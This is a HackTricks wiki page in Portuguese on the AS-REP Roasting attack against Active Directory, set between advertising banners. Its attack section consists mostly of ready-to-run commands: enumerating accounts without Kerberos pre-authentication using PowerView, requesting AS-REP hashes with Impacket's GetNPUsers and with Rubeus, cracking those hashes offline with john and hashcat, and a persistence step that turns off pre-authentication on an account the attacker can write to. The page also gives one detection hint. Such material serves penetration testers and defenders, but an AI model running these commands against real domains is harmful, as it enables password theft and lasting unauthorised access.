6.3 KiB
ASREPRoast
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github HackTricks e HackTricks Cloud.
Junte-se ao servidor HackenProof Discord para se comunicar com hackers experientes e caçadores de recompensas por bugs!
Insights de Hacking
Engaje-se com conteúdos que exploram a emoção e os desafios do hacking
Notícias de Hacking em Tempo Real
Mantenha-se atualizado com o mundo acelerado do hacking através de notícias e insights em tempo real
Últimos Anúncios
Fique informado sobre os mais novos programas de recompensa por bugs e atualizações importantes da plataforma
Junte-se a nós no Discord e comece a colaborar com os melhores hackers hoje mesmo!
ASREPRoast
O ataque ASREPRoast procura por usuários sem o atributo de pré-autenticação do Kerberos necessário (DONT_REQ_PREAUTH).
Isso significa que qualquer pessoa pode enviar uma solicitação AS_REQ ao DC em nome de qualquer um desses usuários e receber uma mensagem AS_REP. Este último tipo de mensagem contém um bloco de dados criptografados com a chave do usuário original, derivada de sua senha. Então, usando esta mensagem, a senha do usuário pode ser quebrada offline.
Além disso, não é necessário ter uma conta de domínio para realizar este ataque, apenas conexão com o DC. No entanto, com uma conta de domínio, uma consulta LDAP pode ser usada para recuperar usuários sem pré-autenticação do Kerberos no domínio. Caso contrário, os nomes de usuário têm que ser adivinhados.
Enumerando usuários vulneráveis (necessita de credenciais de domínio)
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
Solicitar mensagem AS_REP
{% code title="Usando Linux" %}
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
{% endcode %}
{% code title="Usando o Windows" %}
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
{% endcode %}
{% hint style="warning" %} AS-REP Roasting com Rubeus irá gerar um 4768 com um tipo de criptografia de 0x17 e tipo de preautenticação de 0. {% endhint %}
Quebra
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
Persistência
Forçar preauth não necessário para um usuário onde você tem permissões GenericAll (ou permissões para escrever propriedades):
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Referências
Mais informações sobre AS-REP Roasting em ired.team
Participe do servidor HackenProof Discord para se comunicar com hackers experientes e caçadores de recompensas por bugs!
Insights de Hacking
Interaja com conteúdos que exploram a emoção e os desafios do hacking
Notícias de Hacking em Tempo Real
Mantenha-se atualizado com o mundo acelerado do hacking através de notícias e insights em tempo real
Últimos Anúncios
Fique informado com os mais recentes lançamentos de recompensas por bugs e atualizações importantes da plataforma
Junte-se a nós no Discord e comece a colaborar com os melhores hackers hoje mesmo!
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do HackTricks e HackTricks Cloud.